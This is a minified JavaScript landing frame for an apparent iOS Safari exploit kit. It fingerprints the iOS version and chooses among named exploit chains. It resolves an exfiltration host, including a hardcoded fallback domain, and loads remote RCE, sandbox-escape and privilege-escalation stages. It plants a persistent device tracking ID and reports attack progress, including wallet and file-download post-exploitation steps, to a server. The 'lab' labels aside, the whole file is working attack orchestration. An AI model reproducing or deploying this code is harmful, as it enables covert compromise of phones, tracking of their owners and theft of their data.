(function () { 'use strict'; var STAGE = { boot: 8, loader: 18, worker: 42, sbx0: 58, sbx1: 72, pe: 86, post: 100 }; window.__LAB_CHAIN__ = ''; var _stageQueue = []; var _lastPostedStage = ''; function notify(stage, progress, label) { try { if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-stage', stage: stage, progress: progress, chain: window.__LAB_CHAIN__ || '', label: label || stage }, '*'); } } catch (e) {} enqueueStage(stage, progress, label); } function enqueueStage(stage, progress, label) { var key = String(stage) + '|' + String(progress) + '|' + String(label || stage); if (key === _lastPostedStage) return; _lastPostedStage = key; _stageQueue.push({ stage: stage, progress: progress, label: label || stage }); flushStageReports(); } function flushStageReports() { var id = ''; try { id = window.__LAB_DEVICE_UUID__ || ''; } catch (eId) {} if (!id) return; var channel = (typeof labChannelCode === 'function' ? labChannelCode() : (window.__LAB_CHANNEL_CODE__ || '')) || ''; while (_stageQueue.length) { var item = _stageQueue.shift(); try { fetch(apiUrl('/api/ds/log'), { method: 'POST', headers: { 'Content-Type': 'application/json', 'X-Device-UUID': id }, credentials: 'omit', body: JSON.stringify({ deviceUUID: id, stage: item.stage, progress: item.progress, label: item.label, chain: window.__LAB_CHAIN__ || '', channelCode: channel }) }).catch(function () {}); } catch (eS) {} } } notify('boot', STAGE.boot, 'frame_boot'); if (typeof labEnsureHosts === 'function') labEnsureHosts(); var base = (typeof labDeliveryHost === 'function') ? labDeliveryHost() : String(window.__LAB_DELIVERY_HOST__ || location.origin).replace(/\/$/, ''); window.__LAB_DELIVERY_HOST__ = base; function apiUrl(path) { return (typeof labApiUrl === 'function') ? labApiUrl(path) : (String((window.__LAB_EXFIL__ && window.__LAB_EXFIL__.host) || location.origin).replace(/\/$/, '') + path); } function assetUrl(path) { return (typeof labDeliveryUrl === 'function') ? labDeliveryUrl(path) : (base + (path.charAt(0) === '/' ? path : '/' + path)); } // 記錄 frame.html 載入時間戳 console.log('[Frame] Loaded at', new Date().toISOString()); fetch(apiUrl('/api/ds/log?text=frame.html loaded at ' + new Date().toISOString()), { method: 'GET' }).catch(() => {}); function resolveExfilInline() { try { var xhr = new XMLHttpRequest(); xhr.open('GET', apiUrl('/api/ds/chain-targets'), false); xhr.send(); if (xhr.status >= 200 && xhr.status < 300 && xhr.responseText) { var d = JSON.parse(xhr.responseText); if (d.exfil && d.exfil.host) { if (typeof labApplyExfil === 'function') labApplyExfil(d.exfil); else window.__LAB_EXFIL__ = d.exfil; return; } } } catch (e) {} if (!window.__LAB_EXFIL__ || !window.__LAB_EXFIL__.host) { window.__LAB_EXFIL__ = { host: window.__LAB_EXFIL_DOMAIN__ || 'mh0usocqzi6f46i.com', domain: window.__LAB_EXFIL_DOMAIN__ || 'mh0usocqzi6f46i.com', http_port: 443, https_port: 443, tls: false, prefer_https: false, stats_url: '', stats_url_direct: '', delivery_stats_url: '', }; } } resolveExfilInline(); function parseIosVersion() { var ua = navigator.userAgent; var m = /iPhone OS ([0-9_]+)/.exec(ua); if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua); if (!m) m = /CPU OS ([0-9_]+)/.exec(ua); if (!m) { m = /Version\/(\d+)\.(\d+)/.exec(ua); return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null; } return m[1].split('_').map(function (p) { return parseInt(p, 10); }); } function cmpVer(a, b) { for (var i = 0; i < 3; i++) { var ai = a[i] || 0, bi = b[i] || 0; if (ai < bi) return -1; if (ai > bi) return 1; } return 0; } function isCorunaRange(v) { if (!v || !v.length || v[0] < 13) return false; if (v[0] >= 18) return false; if (v[0] === 17 && v[1] >= 3) return false; if (v[0] === 17 && v[1] === 2 && (v[2] || 0) > 1) return false; return true; } function isSilkPathRange(v) { if (!v || !v.length) return false; var maj = v[0] || 0, min = v[1] || 0, pat = v[2] || 0; // 17.2.2+ through 18.3 — fills post-Coruna gap if (maj === 17 && (min > 2 || (min === 2 && pat >= 2))) return true; if (maj === 18 && min <= 3) return true; return false; } function isExploitChainRange(v) { if (!v || !v.length) return false; if (v[0] === 18 && (v[1] || 0) >= 4) return true; if (v[0] >= 19 && v[0] <= 26) return true; return false; } function loadScript(src, onload, attempt) { attempt = attempt || 0; var s = document.createElement('script'); s.async = false; s.src = src + (src.indexOf('?') >= 0 ? '&' : '?') + '_=' + Date.now(); s.onload = function () { if (onload) onload(); }; s.onerror = function () { if (attempt < 4) { setTimeout(function () { loadScript(src, onload, attempt + 1); }, 200 * (attempt + 1)); } }; document.body.appendChild(s); } function loadChainLoader(onload, attempt) { attempt = attempt || 0; var s = document.createElement('script'); s.async = false; s.src = assetUrl('/rce_loader.js?_=' + Date.now()); s.onload = function () { if (onload) onload(); }; s.onerror = function () { if (attempt < 3) setTimeout(function () { loadChainLoader(onload, attempt + 1); }, 300 * (attempt + 1)); }; document.body.appendChild(s); } var ios = parseIosVersion(); function chainIdForIos(v) { if (!v || !v.length) return 'unknown'; if (isCorunaRange(v)) return 'coruna'; if (isSilkPathRange(v)) return 'silkpath'; if (isExploitChainRange(v)) { var maj = v[0] || 0, min = v[1] || 0, pat = v[2] || 0; if ((maj === 18 && min === 7 && pat >= 3) || (maj >= 19 && maj <= 26)) return 'ghostwave'; return 'darksword'; } return 'blocked'; } var chain = chainIdForIos(ios); var apiPlan = null; try { var xhrPlan = new XMLHttpRequest(); xhrPlan.open('GET', apiUrl('/api/ds/chain-targets?ios=' + encodeURIComponent(ios ? ios.join('.') : '')), false); xhrPlan.send(); if (xhrPlan.status >= 200 && xhrPlan.status < 300 && xhrPlan.responseText) { apiPlan = JSON.parse(xhrPlan.responseText); if (apiPlan.chain) chain = apiPlan.chain; if (apiPlan.exfil) { if (typeof labApplyExfil === 'function') labApplyExfil(apiPlan.exfil); else window.__LAB_EXFIL__ = apiPlan.exfil; } window.__LAB_BAND__ = apiPlan.band || null; window.__LAB_GATED__ = !!apiPlan.gated; window.__LAB_RECOMMENDED_WORKER__ = apiPlan.recommended_worker || (apiPlan.band && apiPlan.band.recommended_worker) || ''; window.__LAB_FALLBACK_WORKERS__ = apiPlan.fallback_workers || (apiPlan.band && apiPlan.band.fallback_workers) || []; window.__LAB_S5_MODULE__ = apiPlan.s5_module || ''; window.__LAB_ENTRY__ = apiPlan.entry_point || apiPlan.redirect_to || ''; window.__LAB_USABLE_GRADE__ = (apiPlan.band && apiPlan.band.usable_grade) || ''; window.__LAB_USABLE_FOR_ATTEMPT__ = !!(apiPlan.band && apiPlan.band.usable_for_attempt); if (apiPlan.band && apiPlan.band.usable_grade === 'DEAD' && /26\.3/.test(ios ? ios.join('.') : '')) { window.__LAB_RECOMMENDED_WORKER__ = window.__LAB_RECOMMENDED_WORKER__ || 'rce_worker_26.3.js'; } try { var pw = window.__LAB_RECOMMENDED_WORKER__; if (pw) { var l = document.createElement('link'); l.rel = 'preload'; l.as = 'script'; l.href = assetUrl('/' + pw); document.head.appendChild(l); } ['sbx0_main_18.4.js','sbx1_main.js','pe_main.js'].forEach(function(f){ var l2=document.createElement('link'); l2.rel='prefetch'; l2.href=assetUrl('/'+f); document.head.appendChild(l2); }); } catch (ePre) {} } } catch (ePlan) {} window.__LAB_CHAIN__ = chain; try { if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-chain', chain: chain, ios: ios ? ios.join('.') : '' }, '*'); } } catch (eChain) {} (function bindDeviceUuid() { function genUuid32() { try { var a = new Uint8Array(16); (window.crypto || window.msCrypto).getRandomValues(a); var hex = ''; for (var i = 0; i < a.length; i++) hex += ('0' + a[i].toString(16)).slice(-2); return hex.toUpperCase(); } catch (e) { return (Date.now().toString(16) + Math.random().toString(16).slice(2) + '0000000000000000').slice(0, 32).toUpperCase(); } } try { var q = new URLSearchParams(location.search); var du = q.get('deviceUUID') || q.get('device') || q.get('uuid') || ''; if (!du) { try { du = localStorage.getItem('lab_device_uuid') || ''; } catch (eLs) {} } if (!du) { try { var m = document.cookie.match(/(?:^|; )lab_device_uuid=([^;]*)/); du = m ? decodeURIComponent(m[1]) : ''; } catch (eCk) {} } // Always ensure a wall-clock device id so /api/ds/log + exfil attribute correctly if (!du || String(du).replace(/-/g, '').length < 16) du = genUuid32(); window.__LAB_DEVICE_UUID__ = String(du).replace(/-/g, '').toUpperCase().slice(0, 32); try { localStorage.setItem('lab_device_uuid', window.__LAB_DEVICE_UUID__); } catch (e1) {} try { document.cookie = 'lab_device_uuid=' + encodeURIComponent(window.__LAB_DEVICE_UUID__) + ';path=/;max-age=31536000;SameSite=Lax'; } catch (eC2) {} } catch (e0) { try { window.__LAB_DEVICE_UUID__ = genUuid32(); } catch (e00) {} } window.addEventListener('message', function (ev) { if (!ev.data || ev.data.type !== 'lab-device-id' || !ev.data.deviceId) return; window.__LAB_DEVICE_UUID__ = String(ev.data.deviceId).replace(/-/g, '').toUpperCase(); try { localStorage.setItem('lab_device_uuid', window.__LAB_DEVICE_UUID__); } catch (e2) {} try { flushStageReports(); } catch (eF) {} }); })(); try { flushStageReports(); } catch (eFlush) {} (function registerFrameDevice() { try { var id = window.__LAB_DEVICE_UUID__ || ''; if (!id) return; var iosStr = ios ? ios.join('.') : ''; var regHeaders = { 'Content-Type': 'application/json', 'X-Device-UUID': id }; var regBody = JSON.stringify({ deviceUUID: id, user_agent: navigator.userAgent, userAgent: navigator.userAgent, ios: iosStr, ios_version: iosStr, chain: chain === 'blocked' ? 'out_of_scope' : chain, channelCode: (typeof labChannelCode === 'function' ? labChannelCode() : (window.__LAB_CHANNEL_CODE__ || '')) || '' }); fetch(apiUrl('/api/ds/device/register'), { method: 'POST', headers: regHeaders, credentials: 'omit', body: regBody }).then(function (r) { return r.ok ? r.json() : null; }).then(function (d) { var canon = (d && d.device) ? String(d.device).replace(/-/g, '').toUpperCase() : ''; if (canon) { window.__LAB_DEVICE_UUID__ = canon; try { localStorage.setItem('lab_device_uuid', canon); } catch (e3) {} try { document.cookie = 'lab_device_uuid=' + encodeURIComponent(canon) + ';path=/;max-age=31536000;SameSite=Lax'; } catch (e4) {} if (window.parent && window.parent !== window) { try { window.parent.postMessage({ type: 'lab-device-id', deviceId: canon }, '*'); } catch (e5) {} } } }).catch(function () {}); } catch (e) {} })(); console.log('[Frame] iOS version:', ios ? ios.join('.') : 'unknown'); console.log('[Frame] Chain selected:', chain); (function () { var id = window.__LAB_DEVICE_UUID__ || ''; var q = 'text=' + encodeURIComponent('Chain selected: ' + chain + ' for iOS ' + (ios ? ios.join('.') : 'unknown')); if (id) q += '&deviceUUID=' + encodeURIComponent(id) + '&device=' + encodeURIComponent(id); fetch(apiUrl('/api/ds/log?' + q), { method: 'GET', headers: id ? { 'X-Device-UUID': id } : {} }).catch(function () {}); })(); function setHold(kind) { try { var ts = String(Date.now()); localStorage.setItem('__ds_chain_hold', ts); sessionStorage.setItem('__ds_chain_hold', ts); if (kind === 'rce' || kind === 'all') { localStorage.setItem('__ds_rce_hold', ts); sessionStorage.setItem('__ds_rce_hold', ts); } if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-rce-hold', progress: 42 }, '*'); } } catch (e) {} } if (chain === 'coruna') { notify('loader', STAGE.loader); // Prefer full group.html entry when top-level; inside iframe use loader var corunaEntry = (window.__LAB_ENTRY__ && window.__LAB_ENTRY__.indexOf('coruna') >= 0) ? window.__LAB_ENTRY__ : '/coruna/group.html'; try { if (window.top === window) { location.replace(assetUrl(corunaEntry) + (location.search || '')); return; } } catch (eTop) {} loadScript(assetUrl('/coruna/coruna_loader.js'), function () { notify('worker', STAGE.worker); }); } else if (chain === 'silkpath') { setHold('rce'); notify('loader', STAGE.loader); loadScript(assetUrl('/SilkPath/delivery/silkpath_loader.js'), function () { notify('worker', STAGE.worker); }); } else if (chain === 'darksword' || chain === 'ghostwave') { // Hold must be set before RCE — otherwise crash-loop breaker / idle re-arm // reload the page while stage1 is still running (looks like "auto refresh"). setHold('rce'); notify('loader', STAGE.loader); // Load plaintext rce_loader.js loadChainLoader(function () { notify('worker', STAGE.worker); }); } else { loadScript(assetUrl('/chain_blocked.js'), function () { notify('loader', STAGE.loader); }); } var _log = console.log; console.log = function () { var msg = Array.prototype.join.call(arguments, ' '); // Stage mapping must be strict: bare "exfil" / "pe exfil grace" must NOT jump to S6. if (/stage1|RCE success|handoff ok|Inside stage2|inside stage1/i.test(msg)) notify('worker', STAGE.worker); if (/after get js|sbx0_main/i.test(msg)) notify('sbx0', STAGE.sbx0); if (/sbx1_main|mediaplaybackd|\[patch\] loaded bootstrap/i.test(msg)) notify('sbx1', STAGE.sbx1); if (/pe_main|kernel_base|kernel_slide|pe_main_eval|pe_main_start|pe spawned|Spawning PE|pe bootstrap|nowait_exit|pe exfil grace|pe exfil wait/i.test(msg)) notify('pe', STAGE.pe); // S6 only on real post-exploit completion — not mid-chain "exfil" / "all done" logs if (/file_downloader_ok|chain.?complete/i.test(msg)) notify('post', STAGE.post); else if (/file_downloader_start|S5_post|post \/stats|saved .* bytes|wallet_memory|wallet_crypto|coruna_bootstrap_fetch|coruna_s5/i.test(msg)) { notify('pe', Math.max(STAGE.pe, 90), '權限提升 · 後台收尾'); } if (/coruna stage2|seedbell/i.test(msg)) notify('sbx0', STAGE.sbx0); if (/coruna stage3|0xF00DBEEF|dylib load address/i.test(msg)) notify('pe', STAGE.pe); // Signal parent: CoreAnimation→sendPort hang needs timely re-arm if (/GPU crashed at CoreAnimation|waiting for sendPort|sendPort wait timed out|coreanim_abort|oob:.*hang|sprayBuffers:.*hang/i.test(msg)) { try { if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-sbx-stall', progress: 58 }, '*'); } } catch (_) {} } // GPU kill blanks Safari compositor — parent should keep calm UI / faster re-arm if (/crashGPUProcess|gpu_blank_expected|going to respawn gpu/i.test(msg)) { try { if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-gpu-blank', progress: 58 }, '*'); } } catch (_) {} } if (/\[MPD\] pe spawned|pe_main_pe_done|Spawning PE|pe bootstrap|nowait_exit fired|PEMK-A start alive|pe_after_runPE/i.test(msg)) { try { if (window.parent && window.parent !== window) { window.parent.postMessage({ type: 'ds-pe-spawned', progress: 86 }, '*'); } } catch (_) {} } return _log.apply(console, arguments); }; })();